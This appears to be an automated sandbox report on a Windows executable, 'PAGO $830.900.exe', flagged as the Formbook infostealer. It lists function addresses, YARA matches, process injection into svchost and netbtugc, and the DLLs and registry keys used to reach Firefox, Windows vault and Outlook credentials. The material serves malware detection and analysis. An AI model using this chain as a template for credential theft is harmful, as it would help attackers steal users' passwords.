            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039069624_2_03906962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038D68B84_2_038D68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0391E8F04_2_0391E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F28404_2_038F2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038FA8404_2_038FA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0396EFA04_2_0396EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038E2FC84_2_038E2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038FCFE04_2_038FCFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03910F304_2_03910F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03992F304_2_03992F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03932F284_2_03932F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03964F404_2_03964F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03902E904_2_03902E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039ACE934_2_039ACE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039AEEDB4_2_039AEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039AEE264_2_039AEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F0E594_2_038F0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03908DBF4_2_03908DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038EADE04_2_038EADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0398CD1F4_2_0398CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038FAD004_2_038FAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03990CB54_2_03990CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038E0CF24_2_038E0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F0C004_2_038F0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0393739A4_2_0393739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039A132D4_2_039A132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038DD34C4_2_038DD34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F52A04_2_038F52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0390B2C04_2_0390B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039912ED4_2_039912ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038FB1B04_2_038FB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039BB16B4_2_039BB16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0392516C4_2_0392516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038DF1724_2_038DF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F70C04_2_038F70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0399F0CC4_2_0399F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039A70E94_2_039A70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039AF0E04_2_039AF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039AF7B04_2_039AF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039A16CC4_2_039A16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039356304_2_03935630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0398D5B04_2_0398D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039B95C34_2_039B95C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039A75714_2_039A7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039AF43F4_2_039AF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038E14604_2_038E1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0390FB804_2_0390FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03965BF04_2_03965BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0392DBF94_2_0392DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039AFB764_2_039AFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03935AA04_2_03935AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0398DAAC4_2_0398DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03991AA34_2_03991AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0399DAC64_2_0399DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039AFA494_2_039AFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039A7A464_2_039A7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03963A6C4_2_03963A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039859104_2_03985910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0390B9504_2_0390B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F99504_2_038F9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F38E04_2_038F38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0395D8004_2_0395D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F1F924_2_038F1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039AFFB14_2_039AFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038B3FD24_2_038B3FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038B3FD54_2_038B3FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039AFF094_2_039AFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F9EB04_2_038F9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0390FDC04_2_0390FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039A1D5A4_2_039A1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F3D404_2_038F3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039A7D734_2_039A7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039AFCF24_2_039AFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03969C324_2_03969C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D91A304_2_02D91A30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D8CB804_2_02D8CB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D8C9594_2_02D8C959
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D8C9604_2_02D8C960
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D8AC004_2_02D8AC00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D9329B4_2_02D9329B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D932A04_2_02D932A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D932594_2_02D93259
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D950B04_2_02D950B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DAB5F04_2_02DAB5F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0360E3384_2_0360E338
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0360E7EC4_2_0360E7EC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0360E4534_2_0360E453
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0360CB034_2_0360CB03
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0360CAAB4_2_0360CAAB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0360D8584_2_0360D858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 111 times
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: String function: 00D909B0 appears 46 times
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: String function: 00D948F3 appears 53 times
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: String function: 00D73536 appears 40 times
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: String function: 00D7B606 appears 32 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0396F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03925130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 038DB970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03937E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0395EA12 appears 86 times
            Source: PAGO $830.900.exe, 00000000.00000003.2042631578.0000000003D2D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAGO $830.900.exe
            Source: PAGO $830.900.exe, 00000000.00000003.2043913424.0000000003B83000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAGO $830.900.exe
            Source: PAGO $830.900.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@20/12
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE36D3 GetLastError,FormatMessageW,0_2_00DE36D3
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DD1003 AdjustTokenPrivileges,CloseHandle,0_2_00DD1003
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DD1607 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00DD1607
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE50EB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00DE50EB
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DFA5A3 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00DFA5A3
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE63AC _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00DE63AC
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D76122 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00D76122
            Source: C:\Users\user\Desktop\PAGO $830.900.exeFile created: C:\Users\user\AppData\Local\Temp\autF312.tmpJump to behavior
            Source: PAGO $830.900.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000004.00000002.4479582993.0000000003331000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4479582993.000000000335F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2525221701.000000000333C000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2523077743.0000000003331000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PAGO $830.900.exeReversingLabs: Detection: 62%
            Source: unknownProcess created: C:\Users\user\Desktop\PAGO $830.900.exe "C:\Users\user\Desktop\PAGO $830.900.exe"
            Source: C:\Users\user\Desktop\PAGO $830.900.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAGO $830.900.exe"
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PAGO $830.900.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAGO $830.900.exe"Jump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PAGO $830.900.exeStatic file information: File size 1280512 > 1048576
            Source: PAGO $830.900.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: PAGO $830.900.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: PAGO $830.900.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: PAGO $830.900.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: PAGO $830.900.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: PAGO $830.900.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: PAGO $830.900.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XXOIkqUXwzoOEy.exe, 00000003.00000000.2155456066.00000000006BE000.00000002.00000001.01000000.00000004.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4479745513.00000000006BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PAGO $830.900.exe, 00000000.00000003.2045771670.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, PAGO $830.900.exe, 00000000.00000003.2045918029.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2137653598.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139562708.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2239500272.0000000003703000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2236327251.000000000355E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PAGO $830.900.exe, 00000000.00000003.2045771670.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, PAGO $830.900.exe, 00000000.00000003.2045918029.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2137653598.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139562708.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2239500272.0000000003703000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2236327251.000000000355E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2236959150.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204810568.000000000341A000.00000004.00000020.00020000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000002.4479988906.0000000000748000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4479582993.00000000032AE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4481211759.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.000000000284C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2631846308.0000000010E8C000.00000004.80000000.00040000.00000000.sdmp
